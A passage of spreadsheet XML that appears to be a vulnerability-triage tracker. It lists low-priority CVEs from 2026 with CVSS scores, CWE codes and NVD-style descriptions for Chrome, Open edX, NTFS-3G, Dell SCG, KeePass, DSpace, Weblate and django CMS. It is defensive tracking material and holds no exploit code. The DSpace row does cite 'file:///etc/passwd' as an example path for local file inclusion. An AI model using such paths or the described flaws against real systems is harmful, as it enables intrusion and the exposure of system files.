      <c r="H1079" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1079" s="5" t="inlineStr"/>
      <c r="J1079" s="5" t="inlineStr"/>
      <c r="K1079" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L1079" s="5" t="inlineStr"/>
      <c r="M1079" s="5" t="inlineStr"/>
      <c r="N1079" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1079" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1079" s="5" t="inlineStr"/>
      <c r="Q1079" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1079" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Certificate in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to potentially spoof address bar via crafted network traffic. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S1079" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87463</t>
        </is>
      </c>
    </row>
    <row r="1080">
      <c r="A1080" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1080" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1080" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87597</t>
        </is>
      </c>
      <c r="D1080" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1080" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1080" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1080" s="5" t="inlineStr"/>
      <c r="H1080" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1080" s="5" t="inlineStr"/>
      <c r="J1080" s="5" t="inlineStr"/>
      <c r="K1080" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L1080" s="5" t="inlineStr"/>
      <c r="M1080" s="5" t="inlineStr"/>
      <c r="N1080" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1080" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1080" s="5" t="inlineStr"/>
      <c r="Q1080" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="R1080" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in CustomTabs in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to spoof address bar via a co-installed app. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S1080" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87597</t>
        </is>
      </c>
    </row>
    <row r="1081">
      <c r="A1081" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1081" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1081" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53636</t>
        </is>
      </c>
      <c r="D1081" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E1081" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1081" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1081" s="5" t="inlineStr"/>
      <c r="H1081" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1081" s="5" t="inlineStr"/>
      <c r="J1081" s="5" t="inlineStr"/>
      <c r="K1081" s="5" t="inlineStr"/>
      <c r="L1081" s="5" t="inlineStr"/>
      <c r="M1081" s="5" t="inlineStr"/>
      <c r="N1081" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1081" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P1081" s="5" t="inlineStr"/>
      <c r="Q1081" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="R1081" s="5" t="inlineStr">
        <is>
          <t>Open edX Platform enables the authoring and delivery of online learning at any scale. Prior to commit 3a5ac85, a security vulnerability has been identified in the Open edX LMS platform's LTI (Learning Tools Interoperability) Provider implementation. The validate_timestamp_and_nonce function in lms/djangoapps/lti_provider/signature_validator.py does not validate OAuth nonces or timestamps, allowing an attacker who captures a valid LTI launch request to replay it an unlimited number of times without detection. This issue has been patched via commit 3a5ac85.</t>
        </is>
      </c>
      <c r="S1081" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53636</t>
        </is>
      </c>
    </row>
    <row r="1082">
      <c r="A1082" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1082" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1082" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56136</t>
        </is>
      </c>
      <c r="D1082" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E1082" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1082" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1082" s="5" t="inlineStr"/>
      <c r="H1082" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1082" s="5" t="inlineStr"/>
      <c r="J1082" s="5" t="inlineStr"/>
      <c r="K1082" s="5" t="inlineStr"/>
      <c r="L1082" s="5" t="inlineStr"/>
      <c r="M1082" s="5" t="inlineStr"/>
      <c r="N1082" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1082" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P1082" s="5" t="inlineStr"/>
      <c r="Q1082" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1082" s="5" t="inlineStr">
        <is>
          <t>In NTFS-3G through 2026.2.25, an out-of-bounds read exists in ntfs_ir_nill() in libntfs-3g/index.c that allows an attacker to read possibly confidential information in an ntfs-3g process by crafting a malicious NTFS image. This read operation is triggered by creation of a file with a crafted name.</t>
        </is>
      </c>
      <c r="S1082" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56136</t>
        </is>
      </c>
    </row>
    <row r="1083">
      <c r="A1083" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1083" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1083" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80171</t>
        </is>
      </c>
      <c r="D1083" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E1083" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1083" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1083" s="5" t="inlineStr"/>
      <c r="H1083" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1083" s="5" t="inlineStr"/>
      <c r="J1083" s="5" t="inlineStr"/>
      <c r="K1083" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1083" s="5" t="inlineStr"/>
      <c r="M1083" s="5" t="inlineStr"/>
      <c r="N1083" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1083" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1083" s="5" t="inlineStr"/>
      <c r="Q1083" s="5" t="inlineStr">
        <is>
          <t>CWE-331</t>
        </is>
      </c>
      <c r="R1083" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Insufficient Entropy in PRNG vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to elevation of privileges.</t>
        </is>
      </c>
      <c r="S1083" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80171</t>
        </is>
      </c>
    </row>
    <row r="1084">
      <c r="A1084" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1084" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1084" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81741</t>
        </is>
      </c>
      <c r="D1084" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E1084" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1084" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1084" s="5" t="inlineStr"/>
      <c r="H1084" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1084" s="5" t="inlineStr"/>
      <c r="J1084" s="5" t="inlineStr"/>
      <c r="K1084" s="5" t="inlineStr"/>
      <c r="L1084" s="5" t="inlineStr"/>
      <c r="M1084" s="5" t="inlineStr"/>
      <c r="N1084" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1084" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1084" s="5" t="inlineStr"/>
      <c r="Q1084" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R1084" s="5" t="inlineStr">
        <is>
          <t>The Groundhogg — CRM, Newsletters, and Marketing Automation WordPress plugin before 4.7.2 does not restrict the redirect target of its email preference confirmation flow to the site's own host, allowing unauthenticated attackers to redirect visitors to an arbitrary external URL by way of a crafted link.</t>
        </is>
      </c>
      <c r="S1084" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81741</t>
        </is>
      </c>
    </row>
    <row r="1085">
      <c r="A1085" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1085" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1085" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87555</t>
        </is>
      </c>
      <c r="D1085" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E1085" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1085" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1085" s="5" t="inlineStr"/>
      <c r="H1085" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1085" s="5" t="inlineStr"/>
      <c r="J1085" s="5" t="inlineStr"/>
      <c r="K1085" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L1085" s="5" t="inlineStr"/>
      <c r="M1085" s="5" t="inlineStr"/>
      <c r="N1085" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1085" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1085" s="5" t="inlineStr"/>
      <c r="Q1085" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R1085" s="5" t="inlineStr">
        <is>
          <t>Uninitialized resource in GPU in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to read memory outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1085" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87555</t>
        </is>
      </c>
    </row>
    <row r="1086">
      <c r="A1086" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1086" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1086" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87602</t>
        </is>
      </c>
      <c r="D1086" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E1086" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1086" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1086" s="5" t="inlineStr"/>
      <c r="H1086" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1086" s="5" t="inlineStr"/>
      <c r="J1086" s="5" t="inlineStr"/>
      <c r="K1086" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L1086" s="5" t="inlineStr"/>
      <c r="M1086" s="5" t="inlineStr"/>
      <c r="N1086" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1086" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1086" s="5" t="inlineStr"/>
      <c r="Q1086" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1086" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to potentially read memory outside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S1086" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87602</t>
        </is>
      </c>
    </row>
    <row r="1087">
      <c r="A1087" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1087" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1087" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53468</t>
        </is>
      </c>
      <c r="D1087" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E1087" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1087" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1087" s="5" t="inlineStr"/>
      <c r="H1087" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1087" s="5" t="inlineStr"/>
      <c r="J1087" s="5" t="inlineStr"/>
      <c r="K1087" s="5" t="inlineStr"/>
      <c r="L1087" s="5" t="inlineStr"/>
      <c r="M1087" s="5" t="inlineStr"/>
      <c r="N1087" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1087" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P1087" s="5" t="inlineStr"/>
      <c r="Q1087" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1087" s="5" t="inlineStr">
        <is>
          <t>Typemill is a flat-file, Markdown-based content management system designed for informational documentation websites. Versions prior to 2.23.0 are vulnerable to stored HTML attribute injection in the page metadata fields (`og:title` and `og:description`). An authenticated user with permission to modify page metadata can inject arbitrary HTML attributes into generated `&lt;meta&gt;` tags due to missing output encoding. Under certain browser or DOM interaction scenarios, this may lead to stored cross-site scripting (XSS). Version 2.23.0 fixes the issue.</t>
        </is>
      </c>
      <c r="S1087" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53468</t>
        </is>
      </c>
    </row>
    <row r="1088">
      <c r="A1088" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1088" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1088" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86776</t>
        </is>
      </c>
      <c r="D1088" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E1088" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1088" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1088" s="5" t="inlineStr"/>
      <c r="H1088" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1088" s="5" t="inlineStr"/>
      <c r="J1088" s="5" t="inlineStr"/>
      <c r="K1088" s="5" t="inlineStr"/>
      <c r="L1088" s="5" t="inlineStr"/>
      <c r="M1088" s="5" t="inlineStr"/>
      <c r="N1088" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1088" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1088" s="5" t="inlineStr"/>
      <c r="Q1088" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="R1088" s="5" t="inlineStr">
        <is>
          <t>KeePass versions 2.35 through 2.61.1 fail to validate KDBX header field sizes before memory allocation in the ReadHeaderField function. Attackers can craft a malicious KDBX file declaring excessive header field lengths to trigger allocation of gigabytes of memory, causing the application to consume resources and terminate.</t>
        </is>
      </c>
      <c r="S1088" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86776</t>
        </is>
      </c>
    </row>
    <row r="1089">
      <c r="A1089" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1089" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1089" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49830</t>
        </is>
      </c>
      <c r="D1089" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E1089" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1089" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1089" s="5" t="inlineStr"/>
      <c r="H1089" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1089" s="5" t="inlineStr"/>
      <c r="J1089" s="5" t="inlineStr"/>
      <c r="K1089" s="5" t="inlineStr"/>
      <c r="L1089" s="5" t="inlineStr"/>
      <c r="M1089" s="5" t="inlineStr"/>
      <c r="N1089" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1089" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P1089" s="5" t="inlineStr"/>
      <c r="Q1089" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R1089" s="5" t="inlineStr">
        <is>
          <t>DSpace open source software is a repository application which provides durable access to digital resources. Prior to versions 7.6.7, 8.4, 9.3, and 10.0, when ingesting an aggregated ORE resource by URI (using the OAI-ORE Harvester), the ORE Ingestion Crosswalk does not validate the URI scheme. This may allow for local file inclusion via malicious paths like file:///etc/passwd. The attacker MUST already have DSpace collection administrator privileges in order to perform the attack. This issue has been patched in versions 7.6.7, 8.4, 9.3, and 10.0.</t>
        </is>
      </c>
      <c r="S1089" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49830</t>
        </is>
      </c>
    </row>
    <row r="1090">
      <c r="A1090" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1090" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1090" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61790</t>
        </is>
      </c>
      <c r="D1090" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E1090" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1090" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1090" s="5" t="inlineStr"/>
      <c r="H1090" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1090" s="5" t="inlineStr"/>
      <c r="J1090" s="5" t="inlineStr"/>
      <c r="K1090" s="5" t="inlineStr"/>
      <c r="L1090" s="5" t="inlineStr"/>
      <c r="M1090" s="5" t="inlineStr"/>
      <c r="N1090" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1090" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P1090" s="5" t="inlineStr"/>
      <c r="Q1090" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R1090" s="5" t="inlineStr">
        <is>
          <t>Weblate is a web-based continuous localization platform used to manage software translations. In versions prior to 2026.7, a team can require its members to configure two-factor authentication before receiving the team's permissions, but this requirement is not enforced for site-wide global permissions. As a result, a user who belongs to a team that enforces 2FA and grants a global permission still receives that global permission even without 2FA configured, while the same requirement is correctly applied to project-, component-, and workspace-scoped permissions. Such a user can act on the granted global permission, including reaching the site management interface at /manage/. This issue is fixed in version 2026.7.</t>
        </is>
      </c>
      <c r="S1090" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61790</t>
        </is>
      </c>
    </row>
    <row r="1091">
      <c r="A1091" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1091" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1091" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75526</t>
        </is>
      </c>
      <c r="D1091" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E1091" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1091" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1091" s="5" t="inlineStr"/>
      <c r="H1091" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1091" s="5" t="inlineStr"/>
      <c r="J1091" s="5" t="inlineStr"/>
      <c r="K1091" s="5" t="inlineStr"/>
      <c r="L1091" s="5" t="inlineStr"/>
      <c r="M1091" s="5" t="inlineStr"/>
      <c r="N1091" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1091" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P1091" s="5" t="inlineStr"/>
      <c r="Q1091" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1091" s="5" t="inlineStr">
        <is>
          <t>django CMS is an easy-to-use and developer-friendly enterprise content management system powered by Django. From 5.0.8 until 5.0.9, ContentRenderer.render_placeholder in cms/plugin_rendering.py can pass stored, attacker-controlled values to ContentRenderer.render_exception when plugin rendering fails in edit mode. Values from get_short_description(), the exception message, the placeholder, or placeholder.source are interpolated into a cms-rendering-exception heading and later returned through mark_safe. Because the heading is not escaped, stored HTML executes in an editor’s browser, and settings.DEBUG does not prevent the custom heading from rendering. The fix uses format_html to escape the message before safe placeholder output is returned. This issue is fixed in versions 5.0.9.</t>
        </is>
      </c>
      <c r="S1091" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75526</t>
        </is>
      </c>
    </row>
    <row r="1092">
      <c r="A1092" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1092" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1092" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77643</t>
        </is>
      </c>
      <c r="D1092" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E1092" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1092" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1092" s="5" t="inlineStr"/>
      <c r="H1092" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1092" s="5" t="inlineStr"/>
      <c r="J1092" s="5" t="inlineStr"/>
      <c r="K1092" s="5" t="inlineStr"/>
      <c r="L1092" s="5" t="inlineStr"/>
      <c r="M1092" s="5" t="inlineStr"/>
      <c r="N1092" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1092" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P1092" s="5" t="inlineStr"/>
      <c r="Q1092" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1092" s="5" t="inlineStr">
        <is>
          <t>A cross-site scripting vulnerability in 
queryparser/termgenerator_internal.cc in Xapian xapian-core before 2.1.0 and before 1.4.32 exists due to incomplete HTML escaping by Xapian::MSet::snippet(). NOTE: this issue exists because of a missed corner case of CVE-2018-0499.</t>
        </is>
      </c>
      <c r="S1092" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77643</t>
        </is>
      </c>
    </row>
    <row r="1093">
      <c r="A1093" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1093" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1093" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78486</t>
        </is>
      </c>
      <c r="D1093" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E1093" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1093" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1093" s="5" t="inlineStr"/>
      <c r="H1093" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1093" s="5" t="inlineStr"/>
      <c r="J1093" s="5" t="inlineStr"/>
      <c r="K1093" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1093" s="5" t="inlineStr"/>
      <c r="M1093" s="5" t="inlineStr"/>
      <c r="N1093" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1093" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1093" s="5" t="inlineStr"/>
      <c r="Q1093" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="R1093" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Use of Hard-coded Cryptographic Key vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S1093" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78486</t>
        </is>
      </c>
    </row>
    <row r="1094">
      <c r="A1094" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1094" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1094" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79731</t>
        </is>
      </c>
      <c r="D1094" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E1094" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1094" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1094" s="5" t="inlineStr"/>
      <c r="H1094" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1094" s="5" t="inlineStr"/>
      <c r="J1094" s="5" t="inlineStr"/>
      <c r="K1094" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1094" s="5" t="inlineStr"/>
      <c r="M1094" s="5" t="inlineStr"/>
      <c r="N1094" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1094" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1094" s="5" t="inlineStr"/>
      <c r="Q1094" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R1094"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S1094" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79731</t>
        </is>
      </c>
    </row>
    <row r="1095">
      <c r="A1095" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1095" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1095" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79735</t>
        </is>
      </c>
      <c r="D1095" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E1095" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1095" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1095" s="5" t="inlineStr"/>
      <c r="H1095" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1095" s="5" t="inlineStr"/>
      <c r="J1095" s="5" t="inlineStr"/>
      <c r="K1095" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1095" s="5" t="inlineStr"/>
